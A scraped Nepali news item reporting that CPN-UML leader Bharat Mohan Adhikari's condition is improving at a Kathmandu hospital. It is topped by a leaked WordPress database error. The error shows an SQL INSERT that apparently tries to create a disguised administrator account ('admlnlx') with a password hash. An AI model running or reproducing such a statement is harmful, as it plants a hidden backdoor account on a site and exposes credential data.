WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJzlq7HEZY4aJVPb/kef3L30wrTstK/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:51:32', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस १० –
नेकपा (एमाले)का नेता भरतमोहन अधिकारीको स्वास्थ्य अवस्था सुधारोन्मुख बन्दै गएको छ । स्वास्थ्यमा केही असजिलो महसुस आएपछि शुक्रबार राति बल्खुस्थित बयोधा अस्पतालमा भर्ना हुनुभएका अधिकारीको स्वास्थ्यमा अहिले क्रमिक सुधार आएको पार्टी केन्द्रीय कार्यालयका सचिव कृष्णगोपाल श्रेष्ठले जानकारी दिनुभयो ।
पूर्वउपप्रधानमन्त्री अधिकारीको ठूलो आन्द्रामा सङ्क्रमण रहेकाले त्यसको उपचार भइरहेको बताइएको छ ।